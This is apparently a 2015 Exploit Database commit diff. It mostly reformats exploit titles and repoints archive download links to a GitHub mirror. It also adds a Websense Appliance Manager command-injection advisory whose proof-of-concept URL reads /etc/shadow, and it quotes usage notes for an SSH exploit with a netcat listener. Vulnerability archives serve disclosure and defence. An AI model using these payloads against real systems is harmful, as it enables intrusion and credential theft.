DB: 2015-03-19

2 new exploits

files.csv

@@ -4481,7 +4481,7 @@ id,file,description,date,author,platform,type,port
 4838,platforms/php/webapps/4838.txt,"snetworks php classifieds 5.0 - Remote File Inclusion Vulnerability",2008-01-05,Crackers_Child,php,webapps,0
 4839,platforms/windows/local/4839.pl,"CoolPlayer 2.17 - (.m3u) Stack Overflow Exploit",2008-01-05,Trancek,windows,local,0
 4840,platforms/php/webapps/4840.php,"Tribisur <= 2.0 - Remote SQL Injection Exploit",2008-01-05,x0kster,php,webapps,0
-4841,platforms/php/webapps/4841.txt,"Invision Power Board <= 2.1.7 ACTIVE XSS/SQL Injection Exploit",2008-01-05,"Eugene Minaev",php,webapps,0
+4841,platforms/php/webapps/4841.txt,"Invision Power Board <= 2.1.7 - ACTIVE XSS/SQL Injection Exploit",2008-01-05,"Eugene Minaev",php,webapps,0
 4842,platforms/php/webapps/4842.pl,"NetRisk 1.9.7 (change_submit.php) Remote Password Change Exploit",2008-01-05,Cod3rZ,php,webapps,0
 4843,platforms/php/webapps/4843.txt,"modx CMS 0.9.6.1 - Multiple Vulnerabilities",2008-01-05,BugReport.IR,php,webapps,0
 4844,platforms/php/webapps/4844.txt,"Wordpress Plugin Wp-FileManager 1.2 - Remote Upload Vulnerability",2008-01-06,Houssamix,php,webapps,0
@@ -5255,7 +5255,7 @@ id,file,description,date,author,platform,type,port
 5629,platforms/php/webapps/5629.txt,"Web Slider <= 0.6 Insecure Cookie/Authentication Handling Vuln",2008-05-15,t0pP8uZz,php,webapps,0
 5630,platforms/php/webapps/5630.txt,"Multi-Page Comment System 1.1.0 Insecure Cookie Handling Vulnerability",2008-05-15,t0pP8uZz,php,webapps,0
 5631,platforms/php/webapps/5631.txt,"IMGallery 2.5 Multiply Remote SQL Injection Vulnerabilities",2008-05-15,cOndemned,php,webapps,0
-5632,platforms/multiple/remote/5632.rb,"Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (ruby)",2008-05-16,L4teral,multiple,remote,22
+5632,platforms/multiple/remote/5632.rb,"Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (ruby)",2008-05-16,L4teral,multiple,remote,22
 5633,platforms/asp/webapps/5633.pl,"StanWeb.CMS (default.asp id) Remote SQL Injection Exploit",2008-05-16,JosS,asp,webapps,0
 5634,platforms/php/webapps/5634.htm,"Zomplog <= 3.8.2 (newuser.php) Arbitrary Add Admin Exploit",2008-05-16,ArxWolf,php,webapps,0
 5635,platforms/php/webapps/5635.pl,"Archangel Weblog 0.90.02 (post_id) SQL Injection Exploit",2008-05-16,Stack,php,webapps,0
@@ -32839,6 +32839,8 @@ id,file,description,date,author,platform,type,port
 36415,platforms/java/remote/36415.rb,"ElasticSearch Search Groovy Sandbox Bypass",2015-03-16,metasploit,java,remote,9200
 36417,platforms/windows/local/36417.txt,"Spybot Search & Destroy 1.6.2 Security Center Service - Privilege Escalation",2015-03-17,LiquidWorm,windows,local,0
 36418,platforms/php/webapps/36418.txt,"Moodle 2.5.9/2.6.8/2.7.5/2.8.3 - Block Title Handler Cross-Site Scripting",2015-03-17,LiquidWorm,php,webapps,0
-36419,platforms/multiple/webapps/36419.txt,"Metasploit Project < 4.11.1 Initial User Creation CSRF",2015-03-17,"Mohamed Abdelbaset Elnoby",multiple,webapps,3790
+36419,platforms/multiple/webapps/36419.txt,"Metasploit Project < 4.11.1 - Initial User Creation CSRF",2015-03-17,"Mohamed Abdelbaset Elnoby",multiple,webapps,3790
 36420,platforms/windows/remote/36420.rb,"Adobe Flash Player PCRE Regex Vulnerability",2015-03-17,metasploit,windows,remote,0
 36421,platforms/linux/remote/36421.rb,"Exim GHOST (glibc gethostbyname) Buffer Overflow",2015-03-18,"Qualys Corporation",linux,remote,25
+36422,platforms/windows/dos/36422.txt,"Fortinet Single Sign On Stack Overflow",2015-03-18,"Core Security",windows,dos,8000
+36423,platforms/java/webapps/36423.txt,"Websense Appliance Manager Command Injection Vulnerability",2015-03-18,"Han Sahin",java,webapps,9447

platforms/android/local/9477.txt

@@ -1,6 +1,6 @@
 Source for exploiting CVE-2009-2692 on Android; Hole is closed in Android kernels released August 2009 or later.
 
 orig: http://zenthought.org/content/file/android-root-2009-08-16-source
-back: http://www.exploit-db.com/sploits/android-root-20090816.tar.gz
+back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/android-root-20090816.tar.gz
 
 # milw0rm.com [2009-08-18]

platforms/asp/remote/15213.pl

@@ -10,7 +10,7 @@
 #  Note from Exploit-db: This very first exploit was meant to work with Padbusterdornet or Padbuster v0.2. 
 #  A similar exploitation vector was also added lately in Padbuster v0.3: 
 #  http://www.gdssecurity.com/l/b/2010/10/04/padbuster-v0-3-and-the-net-padding-oracle-attack/
-#  http://www.exploit-db.com/sploits/padBuster.pl
+#  https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/padBuster.pl
 #
 #
 #  Giorgio Fedon - (giorgio.fedon@mindedsecurity.com)

platforms/beos/local/19840.txt

@@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/1098/info
 
 A direct system call containing invalid parameters through int 0x25 will cause the BeOS to crash. Reboot of the machine is required in order to regain normal functionality. 
 
-http://www.exploit-db.com/sploits/19840.tgz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19840.tgz

platforms/bsd/local/19411.txt

@@ -10,4 +10,4 @@ Hacker writes directly to device previously mounted as /usr, clearing file flags
 Hacker mounts modified device as /usr.
 Hacker installs backdoored /usr/bin/login. 
 
-http://www.exploit-db.com/sploits/19411.tgz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19411.tgz

platforms/bsd/local/23655.txt

@@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/9586/info
 
 A vulnerability has been reported to reside in the 'shmat()' system call used in the BSD kernel. Exploiting this issue may allow a local attacker to inject instructions into the memory of a privileged process.
 
-http://www.exploit-db.com/sploits/23655.tar.gz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23655.tar.gz

platforms/bsd/remote/19520.txt

@@ -49,5 +49,5 @@ FreeBSD h4x.Belkin 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Thu Feb 17
 root () mason cse buffalo edu:/usr/obj/usr/src/sys/GENERIC  amd64
 uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
 
-Exploit-DB mirror: http://www.exploit-db.com/sploits/19520.zip
+Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19520.zip
 

platforms/freebsd/local/12090.txt

@@ -15,4 +15,4 @@ Ironmail was found to allow any CLI user to run arbitrary commands with Admin ri
 improper handling of environment variables.
 
 Download:
-http://www.exploit-db.com/sploits/cybsec_advisory_2010_0404.pdf
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cybsec_advisory_2010_0404.pdf

platforms/freebsd/local/12091.txt

@@ -14,4 +14,4 @@ Vulnerability Description:
 Some files that allow to obtain usernames and other internal information can be read by any user inside
 the CLI.
 
-http://www.exploit-db.com/sploits/cybsec_advisory_2010_0403.pdf
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cybsec_advisory_2010_0403.pdf

platforms/freebsd/remote/17462.txt

@@ -196,7 +196,7 @@ Kingcope
 A statically linked linux binary of the exploit can be found below attached is a diff to openssh-5.8p2.
 
 the statically linked binary can be downloaded from http://isowarez.de/ssh_0day
-Mirror: http://www.exploit-db.com/sploits/ssh_0day.tar.gz
+Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/ssh_0day.tar.gz
 
 run like ./ssh -1 -z <yourip> <target>
 setup a netcat, port 443 on yourip first

platforms/freebsd/remote/18181.txt

@@ -33,5 +33,5 @@ BTW my box (isowarez.de) got hacked so expect me in a zine :>
 /Signed "the awesome" Kingcope
 
 Code:
-http://www.exploit-db.com/sploits/7350roaringbeastv3.tar
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/7350roaringbeastv3.tar
 

platforms/freebsd/remote/20593.txt

@@ -8,4 +8,4 @@ It is possible for packets that are not part of an established connection to be
 
 Exploitation of this vulnerability may allow for unauthorized remote access to otherwise protected services. 
 
-http://www.exploit-db.com/sploits/20593.tgz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20593.tgz

platforms/freebsd/webapps/12658.txt

@@ -15,4 +15,4 @@ improper profile check.
 ===========
 Download:
 ===========
-http://www.exploit-db.com/sploits/cybsec_advisory_2010_0501_Ironmail_Advisory_Web_Access_Broken_Access.pdf
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cybsec_advisory_2010_0501_Ironmail_Advisory_Web_Access_Broken_Access.pdf

platforms/hardware/dos/11043.txt

@@ -36,4 +36,4 @@ Email : f3arm3d3ar@gmail.com
 ===============
 Download
 ===============
-http://www.exploit-db.com/sploits/Sony_Ericsson.rar
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/Sony_Ericsson.rar

platforms/hardware/dos/12093.txt

@@ -15,4 +15,4 @@ Users inside the CLI can run some kind of
 of an insecure ulimit value.
 
 Download:
-http://www.exploit-db.com/sploits/cybsec_advisory_2010_0401.pdf
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cybsec_advisory_2010_0401.pdf

platforms/hardware/dos/13823.txt

@@ -1,3 +1,3 @@
 I wrote a fuzzer "dumb fuzzer" and used a sample from http://www.ccp14.ac.uk/ccp/web-mirrors/bca-spreadsheets/scanplot101.xls  which I randomly found on the internet. I mutated the data and tested roughly 1000 cases on several Document Reader Applications for iPhone. 
 
-http://www.exploit-db.com/sploits/savysoda_poc.xls
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/savysoda_poc.xls

platforms/hardware/dos/13824.txt

@@ -1,3 +1,3 @@
 I wrote a fuzzer "dumb fuzzer" and used a sample from http://www.ccp14.ac.uk/ccp/web-mirrors/bca-spreadsheets/scanplot101.xls  which I randomly found on the internet. I mutated the data and tested roughly 1000 cases on several Document Reader Applications for iPhone. 
 
-http://www.exploit-db.com/sploits/office2_poc.xls
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/office2_poc.xls

platforms/hardware/dos/13825.txt

@@ -1,3 +1,3 @@
 I wrote a fuzzer "dumb fuzzer" and used a sample from http://www.ccp14.ac.uk/ccp/web-mirrors/bca-spreadsheets/scanplot101.xls  which I randomly found on the internet. I mutated the data and tested roughly 1000 cases on several Document Reader Applications for iPhone. 
 
-http://www.exploit-db.com/sploits/goodreader_poc.xls
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/goodreader_poc.xls

platforms/hardware/dos/18751.txt

@@ -130,7 +130,7 @@ other bugs and understanding them :)
 
 
 http://aluigi.org/poc/samsux_1.zip
-http://www.exploit-db.com/sploits/18751.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18751.zip
 
 
 #######################################################################

platforms/hardware/dos/20821.txt

@@ -6,4 +6,4 @@ A problem in the Cisco Hot Standby Routing Protocol (HSRP) makes it possible to
 
 This problem makes it possible for system local to the network to deny service to legitmate users of that network segment. 
 
-http://www.exploit-db.com/sploits/20821.tgz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20821.tgz

platforms/hardware/dos/20824.txt

@@ -6,4 +6,4 @@ A problem with the switch firmware could allow a Denial of Service to legitimate
 
 This problem makes it possible for a remote user to deny service to legitimate users of the switch.
 
-http://www.exploit-db.com/sploits/20824.tgz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20824.tgz

platforms/hardware/dos/21092.txt

@@ -7,4 +7,4 @@ CBOS becomes unstable when it receives multiple TCP connections on one of the tw
 
 This problem affects the following Cisco 600 series routers: 627, 633, 673, 675, 675E, 677, 677i and 678. 
 
-http://www.exploit-db.com/sploits/21092.mrc
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/21092.mrc

platforms/hardware/dos/22596.txt

@@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/7575/info
 
 It has been reported that a problem with Verilink broadband routers exists in the handling of TFTP packets. Because of this, an attacker could potentially deny service to legitimate users of the network. 
 
-http://www.exploit-db.com/sploits/22596.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22596.zip

platforms/hardware/dos/22978.txt

@@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/8323/info
 
 It has been reported that under some circumstances, a Cisco appliance running IOS may answer malicious malformed UDP echo packets with replies that contain partial contents from the affected router's memory.
 
-http://www.exploit-db.com/sploits/22978.tgz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22978.tgz

platforms/hardware/dos/23876.txt

@@ -4,4 +4,4 @@ It has been reported that Picophone is prone to a remote buffer overflow vulnera
 
 Successful exploitation of this issue will cause a denial of service condition to be triggered. The attacker may also leverage this issue to execute arbitrary code; this code would be executed in the security context of the user running the affected process.
 
-http://www.exploit-db.com/sploits/23876.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23876.zip

platforms/hardware/dos/23900.txt

@@ -6,4 +6,4 @@ If an attacker is able to overwrite sensitive memory locations, it may be possib
 
 All versions of cdp are assumed to be vulnerable to this issue. 
 
-http://www.exploit-db.com/sploits/23900.tgz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23900.tgz

platforms/hardware/dos/28228.txt

@@ -6,4 +6,4 @@ Exploitation of this vulnerability could cause the firewall application to crash
 
 The individual who discovered this vulnerability claims to have tested it on Sunbelt Kerio Personal Firewall versions 4.3.246 and 4.2.3.912. They were unable to reproduce the vulnerability on version 4.2.3.912, which is an older release. The vulnerable functionality may have been introduced at some point after the 4.2.3.912 release, but this has not been confirmed.
 
-http://www.exploit-db.com/sploits/28228.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28228.zip

platforms/hardware/dos/8013.txt

@@ -27,7 +27,7 @@ POC/EXPLOIT
 you can open this url with the browser or send mms with this image.
 
 http://es.geocities.com/jplopezy/nokiacrash.jpg
-alt: http://www.exploit-db.com/sploits/2009-nokiacrash.jpg
+alt: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-nokiacrash.jpg
 
 ------------------------------------------------------
 Juan Pablo Lopez Yacubian

platforms/hardware/local/21001.txt

@@ -8,4 +8,4 @@ These files are created in /tmp with a guessable naming format, making it trivia
   
 Since user-supplied data is written to the target file, attackers may be able to elevate privileges.
 
-http://www.exploit-db.com/sploits/21001.tar.gz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/21001.tar.gz

platforms/hardware/remote/12298.txt

@@ -9,7 +9,7 @@
 #                    V100R001B121Telmex
 # Exploit Download Link:
 # http://www.hakim.ws/huawei/HG520_udpinfo.tar.gz
-# http://www.exploit-db.com/sploits/HG520_udpinfo.tar.gz
+# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/HG520_udpinfo.tar.gz
 
 
 By sending a specially crafted UDP packet you can remotely obtain the

platforms/hardware/remote/18291.txt

@@ -7,6 +7,6 @@
 # Tested on: Access points from Linksys, Cisco, D-Link, TP-Link, Trendnet, and others
 # CVE : No CVE US-CERT VU#723755
 
-http://www.exploit-db.com/sploits/reaver-1.1.tar.gz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/reaver-1.1.tar.gz
 
 

platforms/hardware/remote/19538.txt

@@ -2,6 +2,6 @@ source: http://www.securityfocus.com/bid/695/info
 
 Hybrid Network's cable modems are vulnerable to several different types of attack due to a lack of authentication for the remote administration/configuration system. The cable modems use a protocol called HSMP, which uses UDP as its transport layer protocol. This makes it trivial to spoof packets and possible for hackers to compromise cable-modem subscribers anonymously. The possible consequences of this problem being exploited are very serious and range from denial of service attacks to running arbitrary code on the modem.
 
-http://www.exploit-db.com/sploits/19538-1.tar.gz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19538-1.tar.gz
-http://www.exploit-db.com/sploits/19538-2.tar.gz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19538-2.tar.gz
-http://www.exploit-db.com/sploits/19538-3.tar.gz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19538-3.tar.gz

platforms/hardware/remote/2034.txt

@@ -1,5 +1,5 @@
 BT Voyager 2091 (Wireless ADSL) Multiple Vulnerabilities
 
-http://www.exploit-db.com/sploits/07182006-btvoyager.tgz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/07182006-btvoyager.tgz
 
 # milw0rm.com [2006-07-18]

platforms/hardware/remote/22532.txt

@@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/7423/info
 
 When a VPN is configured to use a pre-shared master secret and a client attempts to negotiate keys in aggressive mode, a hash of the secret is transmitted across the network in clear-text. This may result in the hash being leaked to eavesdroppers or malicious clients. An offline brute-force attack on this hash may then be performed to obtain the clear-text secret. 
 
-http://www.exploit-db.com/sploits/22532.tar.gz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22532.tar.gz

platforms/hardware/remote/23212.txt

@@ -5,4 +5,4 @@ Authentication Protocol) is prone to a password disclosure weakness that may all
 
 Successful exploitation of this weakness may allow a remote attacker to steal authentication information, potentially allowing for unauthorized network access. 
 
-http://www.exploit-db.com/sploits/23212.tar.bz2
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23212.tar.bz2

platforms/hardware/remote/28056.txt

@@ -13,4 +13,4 @@ Shodanhq.com shows >290.000 entries for the ROSSSH search term.
 The 50 megs Mikrotik package including the all research items can be downloaded here: 
 
 http://www.farlight.org/mikropackage.zip
-http://www.exploit-db.com/sploits/28056.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28056.zip

platforms/hardware/remote/31132.txt

@@ -6,4 +6,4 @@ Attackers can exploit these issues to cause denial-of-service conditions or to o
 
 These issues affect versions prior to ExtremeZ-IP File Server 5.1.2x15 and ExtremeZ-IP Print Server 5.1.2x15. 
 
-http://www.exploit-db.com/sploits/31132.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31132.zip

platforms/hardware/remote/33869.txt

@@ -8,4 +8,4 @@ The following Huawei EchoLife HG520 firmware and software versions are vulnerabl
 Firmware 3.10.18.7-1.0.7.0, 3.10.18.5-1.0.7.0, 3.10.18.4
 Software Versions: V100R001B120Telmex, V100R001B121Telmex 
 
-http://www.exploit-db.com/sploits/33869.tar.gz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33869.tar.gz

platforms/hardware/remote/34465.txt

@@ -1,4 +1,4 @@
 When configured in a high availability mode, the F5 solution suffers from an unauthenticated rsync access vulnerability that can be leveraged to upload a malicious SSH key and gain remote root access to the appliance.
 The BigIP platform configures an rsync daemon listening on the ConfigSync interfaces when the system is configured in a failover mode. The rsync daemon as currently configured does not require any authentication and the “cmi” module has complete read/write access to the system. If the ConfigSync IP addresses are accessible by a malicious third party, it is possible to upload an authorized_keys file directly into the /var/ssh/root directory and then open a root SSH session on the f5 device.
 
-Advisory: http://www.exploit-db.com/sploits/34465.pdf
+Advisory: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/34465.pdf

platforms/hardware/remote/8269.txt

@@ -197,7 +197,7 @@ name="backdoor">
 
 Proof-of-concept brute force tool available at
 http://www.louhinetworks.fi/advisory/Louhi_CMC-brute_090323.zip
-http://www.exploit-db.com/sploits/2009-Louhi_CMC-brute_090323.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-Louhi_CMC-brute_090323.zip
 
 
 Other information:

platforms/hardware/shellcode/13294.txt

@@ -1,6 +1,6 @@
 The pdf is located at:
 
-http://www.exploit-db.com/sploits/lynn-cisco.pdf
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/lynn-cisco.pdf
 
 /str0ke
 

platforms/hardware/webapps/11101.txt

@@ -16,5 +16,5 @@ firmware versions have been confirmed to date:
 Detailed description available here:
 http://www.sourcesec.com/Lab/dlink_hnap_captcha.pdf
 
-POC code available here: http://www.exploit-db.com/sploits/hnap0wn.tar.gz
+POC code available here: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/hnap0wn.tar.gz
 

platforms/hardware/webapps/12092.txt

@@ -17,4 +17,4 @@ because the application fails to sanitize user-supplied input. The vulnerabiliti
 logged-in user.
 
 Download:
-http://www.exploit-db.com/sploits/cybsec_advisory_2010_0402.pdf
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cybsec_advisory_2010_0402.pdf

platforms/hardware/webapps/29959.txt

@@ -44,4 +44,4 @@ http://alguienenlafisi.blogspot.com
 Root-Node
 
 
-Exploit-DB mirror: http://www.exploit-db.com/sploits/29959.nse
+Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29959.nse

platforms/hardware/webapps/34254.txt

@@ -9,7 +9,7 @@ http://www.tp-link.com.de/resources/software/TL-WR740N_V4_130529.zip
 # Tested on: TP-Link TL-WR740N v4
 
 Exploit:
-http://www.exploit-db.com/sploits/34254.7z
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/34254.7z
 
 Vulnerability description:
 The domain name parameters of the "Parental Control" and "Access 

platforms/ios/local/14538.txt

@@ -1,3 +1,3 @@
 The files contained in the archive link below are those that make use of a pdf exploit in order to jailbreak devices running Apple iOS.  These pdf's are of interest in that they originate in userland and give root access to the devices.
 
-http://www.exploit-db.com/sploits/ios_pdf_exploit.7z
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/ios_pdf_exploit.7z

platforms/ios/remote/28081.txt

@@ -54,7 +54,7 @@ into the JS code).
 
 The full exploit code is available here:
 http://packetstormsecurity.com/files/123088/
-http://www.exploit-db.com/sploits/28081.tgz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28081.tgz
 
 +------------------------------------------------------------------------------+
 

platforms/java/remote/30502.txt

@@ -4,4 +4,4 @@ The Sun Java Runtime Environment is prone to a remote privilege-escalation vulne
 
 An attacker can exploit this issue to execute arbitrary code within the context of the user who invoked the Java applet. Successfully exploiting this issue may result in the remote compromise of affected computers. 
 
-http://www.exploit-db.com/sploits/30502.tti
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30502.tti

platforms/java/webapps/36423.txt

@@ -0,0 +1,38 @@
+Abstract
+
+
+A command injection vulnerability was found in Websense Appliance Manager that allows an attacker to execute arbitrary code on the appliance. This issue can be combined with other vulnerabilities, like Cross-Site Scripting, to perform a remote unauthenticated attacks to compromise the appliance.
+
+Tested versions
+
+
+This issue was discovered on Websense Triton v7.8.3 and Websense appliance modules V-Series v7.7. Other versions may be affected as well.
+
+Fix
+
+
+Websense released hotfix 02 for Websense Triton v7.8.4 in which this issue is fixed. More information about this hotfix can be found at the following location:
+http://www.websense.com/support/article/kbarticle/v7-8-4-About-Hotfix-02-for-Web-Security-Solutions
+
+This issue is resolved in TRITON APX Version 8.0. More information about the fixed can be found at the following location:
+http://www.websense.com/support/article/kbarticle/Vulnerabilities-resolved-in-TRITON-APX-Version-8-0
+
+Introduction
+
+
+Websense Data Security Suite contains three modules - Data Security Gateway, Data Discover, and Data Endpoint - that can help manage the risk of losing your data to malicious users or accidental misuse.
+
+The Websense Appliance Manager GUI has a web-based 'command line utility' that provides the ability to execute various network debugging commands, which can be run on any module; Appliance Controller, Content Gateway, Web Security, Network Agent, Email Security Gateway. This command line utility is affected by command injection that allows an attacker to execute arbitrary code on the appliance. This issue can be combined with other vulnerabilities, like Cross-Site Scripting, to perform a remote unauthenticated attacks to compromise the appliance.
+
+Details
+
+
+The CommandLineServlet Java Servlet is responsible for enforcing limitations on the type of network debugging commands users are allowed to run using the GUI. An attacker is able to bypass these limitations by breaking out of any network diagnostics command that requires a second parameter (in this example Destination). This allows the attacker to inject arbitrary system commands. For example, the pipe character (|) is used to redirect the output from one process into the input of another, enabling multiple commands to be chained together. An attacker can leverage this behavior to execute any available system command (such as adduser or nc to start a reverse shell). The output is returned to the user, the commands are executed with elevated privileges (root).
+
+With a little help of social engineering (like sending a link via email/chat), an attacker may trick authenticated users to execute arbitrary commands on behalf of the attacker. A more effective attack would be to abuse other Websense vulnerabilities like Cross-Site Scripting.
+
+The following proof of concept will return the contents of /etc/shadow on affected appliances:
+
+https://host:9447/appmng/servlet/CommandLineServlet?type=exec&uuid=asdfasdf&module=na1&command=ping&Destination=127.0.0.1'|cat%20/etc/shadow'
+
+Other attack scenarios are also possible, like creating a backdoor account on the appliance.

platforms/lin_amd64/local/35472.txt

@@ -43,7 +43,7 @@ by knowing only an address belonging to the application and the offset2lib value
 +------------------+
 
 The proof of concept exploit code is available here:
-http://www.exploit-db.com/sploits/35472.tgz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35472.tgz
 http://packetstormsecurity.com/files/129398
 
 +------------------------------------------------------------------------------+

platforms/lin_x86-64/local/36310.txt

@@ -2,7 +2,7 @@ Sources:
 http://googleprojectzero.blogspot.ca/2015/03/exploiting-dram-rowhammer-bug-to-gain.html
 https://code.google.com/p/google-security-research/issues/detail?id=283
 
-Full PoC: http://www.exploit-db.com/sploits/36310.tar.gz
+Full PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/36310.tar.gz
 
 This is a proof-of-concept exploit that is able to gain kernel
 privileges on machines that are susceptible to the DRAM "rowhammer"

platforms/lin_x86-64/local/36311.txt

@@ -2,7 +2,7 @@ Sources:
 http://googleprojectzero.blogspot.ca/2015/03/exploiting-dram-rowhammer-bug-to-gain.html
 https://code.google.com/p/google-security-research/issues/detail?id=284
 
-Full PoC: http://www.exploit-db.com/sploits/36311.tar.gz
+Full PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/36311.tar.gz
 
 
 This is a proof-of-concept exploit that is able to escape from Native

platforms/lin_x86/remote/20032.txt

@@ -4,4 +4,4 @@ Washington University ftp daemon (wu-ftpd) is a very popular unix ftp server shi
   
 It should be noted that the SITE INDEX command is affected as well. 
 
-http://www.exploit-db.com/sploits/20032.tar.gz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20032.tar.gz

platforms/lin_x86/shellcode/13366.txt

@@ -1,5 +1,5 @@
 # linux/x86 xor-encoded Connect Back Shellcode 371 bytes
 
-http://www.exploit-db.com/sploits/black-RXenc-con-back.tar.gz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/black-RXenc-con-back.tar.gz
 
 # milw0rm.com [2006-04-18]

platforms/linux/dos/10203.txt

@@ -61,4 +61,4 @@ Remote attackers may leverage this issue to cause denial-of-service conditions.
 NOTE: BibTeX may be shipped with various packages, such as TeTeX or TexLive, that may also be vulnerable. 
 
 
-Exploit-DB mirror: http://www.exploit-db.com/sploits/2009-11-22-bibtex-crash.tar.bz2
+Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-11-22-bibtex-crash.tar.bz2

platforms/linux/dos/10206.txt

@@ -146,5 +146,5 @@ Exploiting this issue allows remote attackers to cause denial-of-service conditi
 
 Expat 2.0.1 is vulnerable; other versions may also be affected. 
 
-http://www.exploit-db.com/sploits/2009-11-22-36097.gz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-11-22-36097.gz
-http://www.exploit-db.com/sploits/2009-11-22-36097-2.gz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-11-22-36097-2.gz

platforms/linux/dos/14573.txt

@@ -6,4 +6,4 @@ An attacker can exploit this issue to crash an application that uses the vulnera
 Versions up to and including libTIFF 3.9.4 are vulnerable. 
 
 PoC:
-http://www.exploit-db.com/sploits/lp589145-sample.tif.gz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/lp589145-sample.tif.gz

platforms/linux/dos/18295.txt

@@ -218,5 +218,5 @@ Adam 'pi3' Zabrocki
 
 --
 http://pi3.com.pl
-http://www.exploit-db.com/sploits/p_cve-2011-4362.c
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/p_cve-2011-4362.c
 http://blog.pi3.com.pl/?p=277

platforms/linux/dos/23427.txt

@@ -52,4 +52,4 @@ si_addr:$2 = (void *) 0xaf625080 <gst_riff_create_audio_caps+1888>
 Proof of concept included.
 
 http://www41.zippyshare.com/v/13083235/file.html 
-http://www.exploit-db.com/sploits/23427.rar
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23427.rar

platforms/linux/dos/23757.txt

@@ -4,4 +4,4 @@ It has been reported that the GameSpy SDK is prone to a remote denial of service
 
 Exploitation of this issue may cause the affected GameSpy developed game to crash, denying service to legitimate users.
 
-http://www.exploit-db.com/sploits/23757.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23757.zip

platforms/linux/dos/24815.txt

@@ -4,4 +4,4 @@ It has been reported that the GameSpy SDK is prone to a buffer overflow vulnerab
 
 Exploitation of this issue may allow attackers to execute arbitrary machine code in the context of the affected GameSpy developed game.
 
-http://www.exploit-db.com/sploits/24815.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/24815.zip

platforms/linux/dos/24865.txt

@@ -10,7 +10,7 @@ Sorry I forgot to write headers in previous mail.
 # Tested on: [GNU/Linux]
 # CVE : [CVE-2012-1663]
 
-PoC: http://www.exploit-db.com/sploits/24865.tar.bz2
+PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/24865.tar.bz2
 
 I'm glad to share this to you guys. The test code was attached. You
 also could find them here:

platforms/linux/dos/27762.txt

